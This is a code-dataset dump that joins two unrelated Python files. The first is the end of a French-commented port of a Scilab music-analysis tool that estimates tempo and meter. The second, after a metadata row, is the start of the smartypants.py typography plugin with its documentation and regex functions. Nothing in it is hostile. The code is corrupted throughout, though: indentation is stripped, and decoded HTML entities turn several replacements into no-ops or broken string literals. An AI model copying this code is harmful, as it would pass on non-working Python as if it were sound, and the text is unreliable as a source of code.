# test = np.abs(Note_classees[i2+1:ind_max+1, 0] - Note_classees[i2, 0] - liste_battues[i, 0])
# devient :
if i2 >= ind_max:
test = np.abs(Note_classees[i2, 0] + liste_battues[i, 0])
else:
test = np.abs(
Note_classees[int(i2 + 1):int(ind_max + 1), 0] - Note_classees[i2, 0] - liste_battues[int(i), 0])
distance = np.min(test)
ind_possible = np.argmin(test) + 1
# !!! FJ : cette initialisation semble inutile, à confirmer
#temp_batt = [liste_battues[i, 0]]
# OK tant que ça marche
temp_batt = []
Nb_prop = 1
while (distance < crit_dist) and ((ind_max) < Nb_att - 1):
Nb_prop += 1
# !!! FJ : Je ne sais pas bien ce qu'est censé faire le code là,
# mais je trouve dans mes fichiers des cas (cf bug_2.pckt) où
# i2+ind_possible dépasse la limite du tableau -> j'ajoute un test,
# mais il faudrait voir quelle est la bonne solution
if i2 + ind_possible < Note_classees.shape[0]:
temp_batt.append(
abs(Note_classees[i2, 0] - Note_classees[i2 + ind_possible, 0]))
else:
break
# Mise a jour de la battue (moyenne des battues trouvees
# precedemment)
# !!! FJ : Ça ne sert à rien de faire ces assignations à chaque boucle while, il suffirait de le faire à la fin
# On devrait pouvoir le sortir, à tester
liste_battues[i, 0] = np.mean(temp_batt)
liste_battues[i, 1] = Note_classees[i2 +
ind_possible, 0] - Note_classees[i1, 0]
liste_battues[i, 2] = Nb_prop
# Re-setting for next loop
# !!! FJ : Est-ce qui se passe vraiment ce qu'on veut là ? ind_possible n'est pas recalculé au cours de la boucle
# OUI le commentaire est faux ind_possible est modifié à la
# dernière ligne de cette boucle
i2 += ind_possible
ind_max = min(
i2 + np.floor(liste_battues[i, 0] / tolerance) + 1, Nb_att - 2)
# !!! FJ : il y a un cas bizarre qui arrive notamment sur
# 'current_super_enerve.pckt', je suis obligé d'ajouter un if pour
# reproduire le comportement de scilab dans ce cas pour lequel
# []-1 = -1 alors que pour numpy []-1 = []
if i2 >= ind_max:
test = np.abs(Note_classees[i2, 0] + liste_battues[i, 0])
else:
# print("ind_max: %s" % ind_max)
# print("i: %s" % i)
# print("i2: %s" % i2)
test = np.abs(Note_classees[(
i2 + 1):int(ind_max) + 1, 0] - Note_classees[i2, 0] - liste_battues[i, 0])
distance = np.min(test)
ind_possible = np.argmin(test) + 1
del temp_batt
# !!! FJ : J'ai pas bien suivi ce que fait l'algo, mais ce qu'on trouve dans
# liste_battues est un peu douteux (plusieurs fois la même ligne), à vérifier
# OK, comme l'algo apprend la batue, il peut s'adapter et tomber sur les
# mêmes valeurs
ind_tempo = np.argmax(liste_battues[:, 2])
# !!! FJ : problème l'ordre que sort gsort de scilab pour les valeurs identique est différent de celui que j'obtiens avec np.sort
# -> pour avoir le même résultat je suis obligé d'implémenter ma propre fonction arggsort
k = arggsort(liste_battues[:, 2])
battues_classees = np.zeros([Nb_battues, 3])
for i in np.arange(Nb_battues):
battues_classees[i, :] = liste_battues[k[i], 0:3]
# !!! FJ : dist_batt est définie mais non-utilisée dans la version scilab
# OK
# dist_batt = np.zeros([Nb_battues, Nb_battues])
# Si une battue a un multiple dans la liste, augmentation de son poids
for i in np.arange(Nb_battues):
for j in np.arange(Nb_battues):
# !!! FJ : J'ai un fichier (bug_5.pckt) sur lequel j'obtiens une division par 0 ici
# j'ajoute un test, mais il faudrait voir quelle est la bonne
# solution
if battues_classees[j, 0] != 0.:
if ((battues_classees[i, 0] / battues_classees[j, 0]) > 1.9) \
and ((battues_classees[i, 0] / battues_classees[j, 0]) < 2.1):
battues_classees[i, 2] = battues_classees[i, 2] * 3.0
# !!! FJ : je ne pige pas bien pourquoi il y a le code suivant, les battues
# n'étant pas ordonnées le while s'arrete sur la première de la liste plus
# grande que 0.4, mais on n'a aucune autre garantie sur sa valeur
# si le but c'est de retirer toutes les valeurs en dessous de 0.4,
# ça ne marche pas
# -> Il y a bien un problème en fait il faudrait retirer ces valeurs de battue bien avant au moment où on fait
# ind_battues = np.nonzero(battues<1.3)[0]
ind_mini = 0
if np.max(battues_classees[:, 0]) > 0.4:
while battues_classees[ind_mini, 0] < 0.4:
ind_mini += 1
ind_tempo = np.argmax(battues_classees[ind_mini:Nb_battues, 2])
# !!! FJ : le deuxième indice est manquant dans scilab
# OK
# !!! FJ : J'ai un fichier (bug_5.pckt) sur lequel j'obtiens une division par 0 ici
# j'ajoute un test, mais il faudrait voir quelle est la bonne solution
if battues_classees[ind_tempo + ind_mini, 0] != 0.:
tempo = 60 / battues_classees[ind_tempo + ind_mini, 0]
else:
tempo = 1.
# FJ !!! : ajout pour probleme fichier bug_4.pckt. Voir coment bien gérer
# ce cas
if tempo < 0.:
tempo = 1.
return tempo
def METRIQUE(note_piece):
####################################################
# ESTIMATION DE LA METRIQUE (binaire / ternaire)
####################################################
# Autocorrelation-based estimate of meter
# m = meter(nmat,<option>)
# Returns an autocorrelation-based estimate of meter of NMAT.
# Based on temporal structure and on Thomassen's melodic accent.
# Uses discriminant function derived from a collection of 12000 folk melodies.
# m = 2 for simple duple
# m = 3 for simple triple or compound
#
# Input argument:
# NMAT = notematrix
# OPTION (Optional, string) = Argument 'OPTIMAL' uses a weighted combination
# of duration and melodic accents in the inference of meter (see Toiviainen & Eerola, 2004).
#
# Output:
# M = estimate of meter (M=2 for simple duple; M=3 for simple triple or compound)
#
# References:
# Brown, J. (1993). Determination of the meter of musical scores by
# autocorrelation. Journal of the Acoustical Society of America,
# 94(4), 1953-1957.
# Toiviainen, P. & Eerola, T. (2004). The role of accent periodicities in meter induction:
# a classification study, In x (Ed.), Proceedings of the ICMPC8. xxx:xxx.
#
# Change History :
# Date Time Prog Note
# 11.8.2002 18:36 PT Created under MATLAB 5.3 (Macintosh)
#© Part of the MIDI Toolbox, Copyright © 2004, University of Jyvaskyla, Finland
# See License.txt
# !!! FJ : pourquoi y'a ça ?:
# ac = ofacorr(onsetfunc(nmat,'dur'));
NDIVS = 4 # four divisions per quater note
MAXLAG = 8
ob = note_piece[:, 5]
acc = note_piece[:, 6]
vlen = NDIVS * max(2 * MAXLAG, np.ceil(np.max(ob)) + 1)
of = np.zeros(int(vlen))
# Note FJ : La fonction round de numpy n'utilise pas la même convention que scilab pour les valeurs
# pile entre deux entiers (par exemple 0.5).
# Pour avoir le même comportement que sous scilab, au lieu d'utiliser :
# ind = np.mod(np.round(ob*NDIVS), of.shape[0])
# on utilise la fonction round par défaut de Python qui a le même
# comportement que dans scilab :
my_round = np.vectorize(lambda x: round(x))
ind = np.mod(my_round(ob * NDIVS), of.shape[0])
# Note FJ : on ne peut pas remplacer la boucle suivante par
# of[ind.astype(int)] += acc
# car elle n'est pas équivalente si ind contient plusieurs fois le même
# indice
for k in np.arange(ind.shape[0]):
of[int(ind[k])] += acc[k]
# !!! FJ : éventuellement mettre of-of.mean dans une variable temporaire ici
ac = np.correlate(of - of.mean(), of - of.mean(),
mode='full')[of.shape[0] - 1:]
# !!! FJ : ind1 et ind2 sont définis mais pas utilisés dans scilab
# ind1 = 1;
# ind2 = min(length(ac),MAXLAG*NDIVS+1);
if ac[0] > 0:
ac /= ac[0]
# !!! FJ : réécrire les boucles for ci-dessous en vectoriel
if ac.shape[0] % 2 > 0.:
for i in np.arange(np.floor(ac.shape[0] / 2)):
ac[i] = ac[2 + 2 * i]
else:
for i in np.arange(np.floor(ac.shape[0] / 2) - 1):
ac[int(i)] = ac[2 + 2 * int(i)]
if ac[3] >= ac[5]:
metrique = 2
else:
metrique = 3
return metrique
if __name__ == '__main__':
# duree, tristesse, Enervement, Complexite, metrique, tonalite, tempo, cocktail = PIANOCKTAIL('current_super_enerve.pckt')
# a1 = "Duree = "+str(duree)+" - Tristesse = "+str(tristesse)+" - Enervement = "+str(Enervement)
# a2 = "Complexite = "+str(Complexite)+" - Metrique = "+str(metrique)+" - Tonalite = "+str(tonalite)
# a3 = "Tempo = "+str(tempo)+" - Cocktail = "+str(cocktail)
# print(a1)
# print(a2)
# print(a3)
precision = '10.13'
import sys
if len(sys.argv) > 1:
precision = sys.argv[1]
from glob import glob
data_dir_path = '.'
if len(sys.argv) > 2:
data_dir_path = sys.argv[2]
file_names = glob(data_dir_path + '/*.pckt')
file_names.sort()
#file_names = ['random_96.pckt']
form = '{:' + precision + 'f}'
for file_name in file_names:
duree, tristesse, Enervement, Complexite, metrique, tonalite, tempo, cocktail = PIANOCKTAIL(
file_name)
print('fichier : ' + file_name)
print('duree : ' + form.format(duree))
print('tristesse : ' + form.format(tristesse))
print('enervement : ' + form.format(Enervement))
print('complexite : ' + form.format(Complexite))
print('metrique : ' + form.format(metrique))
print('tonalite : ' + form.format(tonalite))
print('tempo : ' + form.format(tempo))
print('cocktail : ' + cocktail)
print('')
sys.stdout.flush()
sys.stderr.write(file_name + ' processed by Python\n')
sys.stderr.flush()
sys.stderr.write('\nProcessing by Python finished\n\n')
sys.stderr.flush()
| lgpl-2.1 | -671,513,183,776,288,300 | 38.030189 | 133 | 0.547731 | false |
stone5495/NewsBlur | vendor/typogrify/smartypants.py | 37 | 29160 | #!/usr/bin/python
r"""
==============
smartypants.py
==============
----------------------------
SmartyPants ported to Python
----------------------------
Ported by `Chad Miller`_
Copyright (c) 2004, 2007 Chad Miller
original `SmartyPants`_ by `John Gruber`_
Copyright (c) 2003 John Gruber
Synopsis
========
A smart-quotes plugin for Pyblosxom_.
The priginal "SmartyPants" is a free web publishing plug-in for Movable Type,
Blosxom, and BBEdit that easily translates plain ASCII punctuation characters
into "smart" typographic punctuation HTML entities.
This software, *smartypants.py*, endeavours to be a functional port of
SmartyPants to Python, for use with Pyblosxom_.
Description
===========
SmartyPants can perform the following transformations:
- Straight quotes ( " and ' ) into "curly" quote HTML entities
- Backticks-style quotes (\`\`like this'') into "curly" quote HTML entities
- Dashes (``--`` and ``---``) into en- and em-dash entities
- Three consecutive dots (``...`` or ``. . .``) into an ellipsis entity
This means you can write, edit, and save your posts using plain old
ASCII straight quotes, plain dashes, and plain dots, but your published
posts (and final HTML output) will appear with smart quotes, em-dashes,
and proper ellipses.
SmartyPants does not modify characters within ``<pre>``, ``<code>``, ``<kbd>``,
``<math>`` or ``<script>`` tag blocks. Typically, these tags are used to
display text where smart quotes and other "smart punctuation" would not be
appropriate, such as source code or example markup.
Backslash Escapes
=================
If you need to use literal straight quotes (or plain hyphens and
periods), SmartyPants accepts the following backslash escape sequences
to force non-smart punctuation. It does so by transforming the escape
sequence into a decimal-encoded HTML entity:
(FIXME: table here.)
.. comment It sucks that there's a disconnect between the visual layout and table markup when special characters are involved.
.. comment ====== ===== =========
.. comment Escape Value Character
.. comment ====== ===== =========
.. comment \\\\\\\\ \ \\\\
.. comment \\\\" " "
.. comment \\\\' ' '
.. comment \\\\. . .
.. comment \\\\- - \-
.. comment \\\\` ` \`
.. comment ====== ===== =========
This is useful, for example, when you want to use straight quotes as
foot and inch marks: 6'2" tall; a 17" iMac.
Options
=======
For Pyblosxom users, the ``smartypants_attributes`` attribute is where you
specify configuration options.
Numeric values are the easiest way to configure SmartyPants' behavior:
"0"
Suppress all transformations. (Do nothing.)
"1"
Performs default SmartyPants transformations: quotes (including
\`\`backticks'' -style), em-dashes, and ellipses. "``--``" (dash dash)
is used to signify an em-dash; there is no support for en-dashes.
"2"
Same as smarty_pants="1", except that it uses the old-school typewriter
shorthand for dashes: "``--``" (dash dash) for en-dashes, "``---``"
(dash dash dash)
for em-dashes.
"3"
Same as smarty_pants="2", but inverts the shorthand for dashes:
"``--``" (dash dash) for em-dashes, and "``---``" (dash dash dash) for
en-dashes.
"-1"
Stupefy mode. Reverses the SmartyPants transformation process, turning
the HTML entities produced by SmartyPants into their ASCII equivalents.
E.g. "“" is turned into a simple double-quote ("), "—" is
turned into two dashes, etc.
The following single-character attribute values can be combined to toggle
individual transformations from within the smarty_pants attribute. For
example, to educate normal quotes and em-dashes, but not ellipses or
\`\`backticks'' -style quotes:
``py['smartypants_attributes'] = "1"``
"q"
Educates normal quote characters: (") and (').
"b"
Educates \`\`backticks'' -style double quotes.
"B"
Educates \`\`backticks'' -style double quotes and \`single' quotes.
"d"
Educates em-dashes.
"D"
Educates em-dashes and en-dashes, using old-school typewriter shorthand:
(dash dash) for en-dashes, (dash dash dash) for em-dashes.
"i"
Educates em-dashes and en-dashes, using inverted old-school typewriter
shorthand: (dash dash) for em-dashes, (dash dash dash) for en-dashes.
"e"
Educates ellipses.
"w"
Translates any instance of ``"`` into a normal double-quote character.
This should be of no interest to most people, but of particular interest
to anyone who writes their posts using Dreamweaver, as Dreamweaver
inexplicably uses this entity to represent a literal double-quote
character. SmartyPants only educates normal quotes, not entities (because
ordinarily, entities are used for the explicit purpose of representing the
specific character they represent). The "w" option must be used in
conjunction with one (or both) of the other quote options ("q" or "b").
Thus, if you wish to apply all SmartyPants transformations (quotes, en-
and em-dashes, and ellipses) and also translate ``"`` entities into
regular quotes so SmartyPants can educate them, you should pass the
following to the smarty_pants attribute:
The ``smartypants_forbidden_flavours`` list contains pyblosxom flavours for
which no Smarty Pants rendering will occur.
Caveats
=======
Why You Might Not Want to Use Smart Quotes in Your Weblog
---------------------------------------------------------
For one thing, you might not care.
Most normal, mentally stable individuals do not take notice of proper
typographic punctuation. Many design and typography nerds, however, break
out in a nasty rash when they encounter, say, a restaurant sign that uses
a straight apostrophe to spell "Joe's".
If you're the sort of person who just doesn't care, you might well want to
continue not caring. Using straight quotes -- and sticking to the 7-bit
ASCII character set in general -- is certainly a simpler way to live.
Even if you I *do* care about accurate typography, you still might want to
think twice before educating the quote characters in your weblog. One side
effect of publishing curly quote HTML entities is that it makes your
weblog a bit harder for others to quote from using copy-and-paste. What
happens is that when someone copies text from your blog, the copied text
contains the 8-bit curly quote characters (as well as the 8-bit characters
for em-dashes and ellipses, if you use these options). These characters
are not standard across different text encoding methods, which is why they
need to be encoded as HTML entities.
People copying text from your weblog, however, may not notice that you're
using curly quotes, and they'll go ahead and paste the unencoded 8-bit
characters copied from their browser into an email message or their own
weblog. When pasted as raw "smart quotes", these characters are likely to
get mangled beyond recognition.
That said, my own opinion is that any decent text editor or email client
makes it easy to stupefy smart quote characters into their 7-bit
equivalents, and I don't consider it my problem if you're using an
indecent text editor or email client.
Algorithmic Shortcomings
------------------------
One situation in which quotes will get curled the wrong way is when
apostrophes are used at the start of leading contractions. For example:
``'Twas the night before Christmas.``
In the case above, SmartyPants will turn the apostrophe into an opening
single-quote, when in fact it should be a closing one. I don't think
this problem can be solved in the general case -- every word processor
I've tried gets this wrong as well. In such cases, it's best to use the
proper HTML entity for closing single-quotes (``’``) by hand.
Bugs
====
To file bug reports or feature requests (other than topics listed in the
Caveats section above) please send email to: mailto:[email protected]
If the bug involves quotes being curled the wrong way, please send example
text to illustrate.
To Do list
----------
- Provide a function for use within templates to quote anything at all.
Version History
===============
1.5_1.6: Fri, 27 Jul 2007 07:06:40 -0400
- Fixed bug where blocks of precious unalterable text was instead
interpreted. Thanks to Le Roux and Dirk van Oosterbosch.
1.5_1.5: Sat, 13 Aug 2005 15:50:24 -0400
- Fix bogus magical quotation when there is no hint that the
user wants it, e.g., in "21st century". Thanks to Nathan Hamblen.
- Be smarter about quotes before terminating numbers in an en-dash'ed
range.
1.5_1.4: Thu, 10 Feb 2005 20:24:36 -0500
- Fix a date-processing bug, as reported by jacob childress.
- Begin a test-suite for ensuring correct output.
- Removed import of "string", since I didn't really need it.
(This was my first every Python program. Sue me!)
1.5_1.3: Wed, 15 Sep 2004 18:25:58 -0400
- Abort processing if the flavour is in forbidden-list. Default of
[ "rss" ] (Idea of Wolfgang SCHNERRING.)
- Remove stray virgules from en-dashes. Patch by Wolfgang SCHNERRING.
1.5_1.2: Mon, 24 May 2004 08:14:54 -0400
- Some single quotes weren't replaced properly. Diff-tesuji played
by Benjamin GEIGER.
1.5_1.1: Sun, 14 Mar 2004 14:38:28 -0500
- Support upcoming pyblosxom 0.9 plugin verification feature.
1.5_1.0: Tue, 09 Mar 2004 08:08:35 -0500
- Initial release
Version Information
-------------------
Version numbers will track the SmartyPants_ version numbers, with the addition
of an underscore and the smartypants.py version on the end.
New versions will be available at `http://wiki.chad.org/SmartyPantsPy`_
.. _http://wiki.chad.org/SmartyPantsPy: http://wiki.chad.org/SmartyPantsPy
Authors
=======
`John Gruber`_ did all of the hard work of writing this software in Perl for
`Movable Type`_ and almost all of this useful documentation. `Chad Miller`_
ported it to Python to use with Pyblosxom_.
Additional Credits
==================
Portions of the SmartyPants original work are based on Brad Choate's nifty
MTRegex plug-in. `Brad Choate`_ also contributed a few bits of source code to
this plug-in. Brad Choate is a fine hacker indeed.
`Jeremy Hedley`_ and `Charles Wiltgen`_ deserve mention for exemplary beta
testing of the original SmartyPants.
`Rael Dornfest`_ ported SmartyPants to Blosxom.
.. _Brad Choate: http://bradchoate.com/
.. _Jeremy Hedley: http://antipixel.com/
.. _Charles Wiltgen: http://playbacktime.com/
.. _Rael Dornfest: http://raelity.org/
Copyright and License
=====================
SmartyPants_ license::
Copyright (c) 2003 John Gruber
(http://daringfireball.net/)
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in
the documentation and/or other materials provided with the
distribution.
* Neither the name "SmartyPants" nor the names of its contributors
may be used to endorse or promote products derived from this
software without specific prior written permission.
This software is provided by the copyright holders and contributors "as
is" and any express or implied warranties, including, but not limited
to, the implied warranties of merchantability and fitness for a
particular purpose are disclaimed. In no event shall the copyright
owner or contributors be liable for any direct, indirect, incidental,
special, exemplary, or consequential damages (including, but not
limited to, procurement of substitute goods or services; loss of use,
data, or profits; or business interruption) however caused and on any
theory of liability, whether in contract, strict liability, or tort
(including negligence or otherwise) arising in any way out of the use
of this software, even if advised of the possibility of such damage.
smartypants.py license::
smartypants.py is a derivative work of SmartyPants.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in
the documentation and/or other materials provided with the
distribution.
This software is provided by the copyright holders and contributors "as
is" and any express or implied warranties, including, but not limited
to, the implied warranties of merchantability and fitness for a
particular purpose are disclaimed. In no event shall the copyright
owner or contributors be liable for any direct, indirect, incidental,
special, exemplary, or consequential damages (including, but not
limited to, procurement of substitute goods or services; loss of use,
data, or profits; or business interruption) however caused and on any
theory of liability, whether in contract, strict liability, or tort
(including negligence or otherwise) arising in any way out of the use
of this software, even if advised of the possibility of such damage.
.. _John Gruber: http://daringfireball.net/
.. _Chad Miller: http://web.chad.org/
.. _Pyblosxom: http://roughingit.subtlehints.net/pyblosxom
.. _SmartyPants: http://daringfireball.net/projects/smartypants/
.. _Movable Type: http://www.movabletype.org/
"""
default_smartypants_attr = "1"
import re
tags_to_skip_regex = re.compile(r"<(/)?(pre|code|kbd|script|math)[^>]*>", re.I)
def verify_installation(request):
return 1
# assert the plugin is functional
def cb_story(args):
global default_smartypants_attr
try:
forbidden_flavours = args["entry"]["smartypants_forbidden_flavours"]
except KeyError:
forbidden_flavours = [ "rss" ]
try:
attributes = args["entry"]["smartypants_attributes"]
except KeyError:
attributes = default_smartypants_attr
if attributes is None:
attributes = default_smartypants_attr
entryData = args["entry"].getData()
try:
if args["request"]["flavour"] in forbidden_flavours:
return
except KeyError:
if "<" in args["entry"]["body"][0:15]: # sniff the stream
return # abort if it looks like escaped HTML. FIXME
# FIXME: make these configurable, perhaps?
args["entry"]["body"] = smartyPants(entryData, attributes)
args["entry"]["title"] = smartyPants(args["entry"]["title"], attributes)
### interal functions below here
def smartyPants(text, attr=default_smartypants_attr):
convert_quot = False # should we translate " entities into normal quotes?
# Parse attributes:
# 0 : do nothing
# 1 : set all
# 2 : set all, using old school en- and em- dash shortcuts
# 3 : set all, using inverted old school en and em- dash shortcuts
#
# q : quotes
# b : backtick quotes (``double'' only)
# B : backtick quotes (``double'' and `single')
# d : dashes
# D : old school dashes
# i : inverted old school dashes
# e : ellipses
# w : convert " entities to " for Dreamweaver users
skipped_tag_stack = []
do_dashes = "0"
do_backticks = "0"
do_quotes = "0"
do_ellipses = "0"
do_stupefy = "0"
if attr == "0":
# Do nothing.
return text
elif attr == "1":
do_quotes = "1"
do_backticks = "1"
do_dashes = "1"
do_ellipses = "1"
elif attr == "2":
# Do everything, turn all options on, use old school dash shorthand.
do_quotes = "1"
do_backticks = "1"
do_dashes = "2"
do_ellipses = "1"
elif attr == "3":
# Do everything, turn all options on, use inverted old school dash shorthand.
do_quotes = "1"
do_backticks = "1"
do_dashes = "3"
do_ellipses = "1"
elif attr == "-1":
# Special "stupefy" mode.
do_stupefy = "1"
else:
for c in attr:
if c == "q": do_quotes = "1"
elif c == "b": do_backticks = "1"
elif c == "B": do_backticks = "2"
elif c == "d": do_dashes = "1"
elif c == "D": do_dashes = "2"
elif c == "i": do_dashes = "3"
elif c == "e": do_ellipses = "1"
elif c == "w": convert_quot = "1"
else:
pass
# ignore unknown option
tokens = _tokenize(text)
result = []
in_pre = False
prev_token_last_char = ""
# This is a cheat, used to get some context
# for one-character tokens that consist of
# just a quote char. What we do is remember
# the last character of the previous text
# token, to use as context to curl single-
# character quote tokens correctly.
for cur_token in tokens:
if cur_token[0] == "tag":
# Don't mess with quotes inside some tags. This does not handle self <closing/> tags!
result.append(cur_token[1])
skip_match = tags_to_skip_regex.match(cur_token[1])
if skip_match is not None:
if not skip_match.group(1):
skipped_tag_stack.append(skip_match.group(2).lower())
in_pre = True
else:
if len(skipped_tag_stack) > 0:
if skip_match.group(2).lower() == skipped_tag_stack[-1]:
skipped_tag_stack.pop()
else:
pass
# This close doesn't match the open. This isn't XHTML. We should barf here.
if len(skipped_tag_stack) == 0:
in_pre = False
else:
t = cur_token[1]
last_char = t[-1:] # Remember last char of this token before processing.
if not in_pre:
oldstr = t
t = processEscapes(t)
if convert_quot != "0":
t = re.sub('"', '"', t)
if do_dashes != "0":
if do_dashes == "1":
t = educateDashes(t)
if do_dashes == "2":
t = educateDashesOldSchool(t)
if do_dashes == "3":
t = educateDashesOldSchoolInverted(t)
if do_ellipses != "0":
t = educateEllipses(t)
# Note: backticks need to be processed before quotes.
if do_backticks != "0":
t = educateBackticks(t)
if do_backticks == "2":
t = educateSingleBackticks(t)
if do_quotes != "0":
if t == "'":
# Special case: single-character ' token
if re.match("\S", prev_token_last_char):
t = "’"
else:
t = "‘"
elif t == '"':
# Special case: single-character " token
if re.match("\S", prev_token_last_char):
t = "”"
else:
t = "“"
else:
# Normal case:
t = educateQuotes(t)
if do_stupefy == "1":
t = stupefyEntities(t)
prev_token_last_char = last_char
result.append(t)
return "".join(result)
def educateQuotes(str):
"""
Parameter: String.
Returns: The string, with "educated" curly quote HTML entities.
Example input: "Isn't this fun?"
Example output: “Isn’t this fun?”
"""
oldstr = str
punct_class = r"""[!"#\$\%'()*+,-.\/:;<=>?\@\[\\\]\^_`{|}~]"""
# Special case if the very first character is a quote
# followed by punctuation at a non-word-break. Close the quotes by brute force:
str = re.sub(r"""^'(?=%s\\B)""" % (punct_class,), r"""’""", str)
str = re.sub(r"""^"(?=%s\\B)""" % (punct_class,), r"""”""", str)
# Special case for double sets of quotes, e.g.:
# <p>He said, "'Quoted' words in a larger quote."</p>
str = re.sub(r""""'(?=\w)""", """“‘""", str)
str = re.sub(r"""'"(?=\w)""", """‘“""", str)
# Special case for decade abbreviations (the '80s):
str = re.sub(r"""\b'(?=\d{2}s)""", r"""’""", str)
close_class = r"""[^\ \t\r\n\[\{\(\-]"""
dec_dashes = r"""–|—"""
# Get most opening single quotes:
opening_single_quotes_regex = re.compile(r"""
(
\s | # a whitespace char, or
| # a non-breaking space entity, or
-- | # dashes, or
&[mn]dash; | # named dash entities
%s | # or decimal entities
&\#x201[34]; # or hex
)
' # the quote
(?=\w) # followed by a word character
""" % (dec_dashes,), re.VERBOSE)
str = opening_single_quotes_regex.sub(r"""\1‘""", str)
closing_single_quotes_regex = re.compile(r"""
(%s)
'
(?!\s | s\b | \d)
""" % (close_class,), re.VERBOSE)
str = closing_single_quotes_regex.sub(r"""\1’""", str)
closing_single_quotes_regex = re.compile(r"""
(%s)
'
(\s | s\b)
""" % (close_class,), re.VERBOSE)
str = closing_single_quotes_regex.sub(r"""\1’\2""", str)
# Any remaining single quotes should be opening ones:
str = re.sub(r"""'""", r"""‘""", str)
# Get most opening double quotes:
opening_double_quotes_regex = re.compile(r"""
(
\s | # a whitespace char, or
| # a non-breaking space entity, or
-- | # dashes, or
&[mn]dash; | # named dash entities
%s | # or decimal entities
&\#x201[34]; # or hex
)
" # the quote
(?=\w) # followed by a word character
""" % (dec_dashes,), re.VERBOSE)
str = opening_double_quotes_regex.sub(r"""\1“""", str)
# Double closing quotes:
closing_double_quotes_regex = re.compile(r"""
#(%s)? # character that indicates the quote should be closing
"
(?=\s)
""" % (close_class,), re.VERBOSE)
str = closing_double_quotes_regex.sub(r"""”""", str)
closing_double_quotes_regex = re.compile(r"""
(%s) # character that indicates the quote should be closing
"
""" % (close_class,), re.VERBOSE)
str = closing_double_quotes_regex.sub(r"""\1”""", str)
# Any remaining quotes should be opening ones.
str = re.sub(r'"', r"""“""", str)
return str
def educateBackticks(str):
"""
Parameter: String.
Returns: The string, with ``backticks'' -style double quotes
translated into HTML curly quote entities.
Example input: ``Isn't this fun?''
Example output: “Isn't this fun?”
"""
str = re.sub(r"""``""", r"""“""", str)
str = re.sub(r"""''""", r"""”""", str)
return str
def educateSingleBackticks(str):
"""
Parameter: String.
Returns: The string, with `backticks' -style single quotes
translated into HTML curly quote entities.
Example input: `Isn't this fun?'
Example output: ‘Isn’t this fun?’
"""
str = re.sub(r"""`""", r"""‘""", str)
str = re.sub(r"""'""", r"""’""", str)
return str
def educateDashes(str):
"""
Parameter: String.
Returns: The string, with each instance of "--" translated to
an em-dash HTML entity.
"""
str = re.sub(r"""---""", r"""–""", str) # en (yes, backwards)
str = re.sub(r"""--""", r"""—""", str) # em (yes, backwards)
return str
def educateDashesOldSchool(str):
"""
Parameter: String.
Returns: The string, with each instance of "--" translated to
an en-dash HTML entity, and each "---" translated to
an em-dash HTML entity.
"""
str = re.sub(r"""---""", r"""—""", str) # em (yes, backwards)
str = re.sub(r"""--""", r"""–""", str) # en (yes, backwards)
return str
def educateDashesOldSchoolInverted(str):
"""
Parameter: String.
Returns: The string, with each instance of "--" translated to
an em-dash HTML entity, and each "---" translated to
an en-dash HTML entity. Two reasons why: First, unlike the
en- and em-dash syntax supported by
EducateDashesOldSchool(), it's compatible with existing
entries written before SmartyPants 1.1, back when "--" was
only used for em-dashes. Second, em-dashes are more
common than en-dashes, and so it sort of makes sense that
the shortcut should be shorter to type. (Thanks to Aaron
Swartz for the idea.)
"""
str = re.sub(r"""---""", r"""–""", str) # em
str = re.sub(r"""--""", r"""—""", str) # en
return str
def educateEllipses(str):
"""
Parameter: String.
Returns: The string, with each instance of "..." translated to
an ellipsis HTML entity.
Example input: Huh...?
Example output: Huh…?
"""
str = re.sub(r"""\.\.\.""", r"""…""", str)
str = re.sub(r"""\. \. \.""", r"""…""", str)
return str
def stupefyEntities(str):
"""
Parameter: String.
Returns: The string, with each SmartyPants HTML entity translated to
its ASCII counterpart.
Example input: “Hello — world.”
Example output: "Hello -- world."
"""
str = re.sub(r"""–""", r"""-""", str) # en-dash
str = re.sub(r"""—""", r"""--""", str) # em-dash
str = re.sub(r"""‘""", r"""'""", str) # open single quote
str = re.sub(r"""’""", r"""'""", str) # close single quote
str = re.sub(r"""“""", r'''"''', str) # open double quote
str = re.sub(r"""”""", r'''"''', str) # close double quote
str = re.sub(r"""…""", r"""...""", str)# ellipsis
return str
def processEscapes(str):
r"""
Parameter: String.
Returns: The string, with after processing the following backslash
escape sequences. This is useful if you want to force a "dumb"
quote or other character to appear.
Escape Value
------ -----
\\ \
\" "
\' '
\. .
\- -
\` `
"""
str = re.sub(r"""\\\\""", r"""\""", str)
str = re.sub(r'''\\"''', r""""""", str)
str = re.sub(r"""\\'""", r"""'""", str)
str = re.sub(r"""\\\.""", r""".""", str)
str = re.sub(r"""\\-""", r"""-""", str)
str = re.sub(r"""\\`""", r"""`""", str)
return str
def _tokenize(str):
"""
Parameter: String containing HTML markup.
Returns: Reference to an array of the tokens comprising the input
string. Each token is either a tag (possibly with nested,
tags contained therein, such as <a href="<MTFoo>">, or a
run of text between tags. Each element of the array is a
two-element array; the first is either 'tag' or 'text';
the second is the actual value.
Based on the _tokenize() subroutine from Brad Choate's MTRegex plugin.
<http://www.bradchoate.com/past/mtregex.php>
"""
pos = 0
length = len(str)
tokens = []
depth = 6
nested_tags = "|".join(['(?:<(?:[^<>]',] * depth) + (')*>)' * depth)
#match = r"""(?: <! ( -- .*? -- \s* )+ > ) | # comments
# (?: <\? .*? \?> ) | # directives
# %s # nested tags """ % (nested_tags,)
tag_soup = re.compile(r"""([^<]*)(<[^>]*>)""")
token_match = tag_soup.search(str)
previous_end = 0
while token_match is not None:
if token_match.group(1):
tokens.append(['text', token_match.group(1)])
tokens.append(['tag', token_match.group(2)])
previous_end = token_match.end()
token_match = tag_soup.search(str, token_match.end())
if previous_end < len(str):
tokens.append(['text', str[previous_end:]])
return tokens
if __name__ == "__main__":
import locale
try:
locale.setlocale(locale.LC_ALL, '')
except:
pass
from docutils.core import publish_string
docstring_html = publish_string(__doc__, writer_name='html')
print docstring_html
# Unit test output goes out stderr. No worries.
import unittest
sp = smartyPants
class TestSmartypantsAllAttributes(unittest.TestCase):
# the default attribute is "1", which means "all".
def test_dates(self):
self.assertEqual(sp("1440-80's"), "1440-80’s")
self.assertEqual(sp("1440-'80s"), "1440-‘80s")
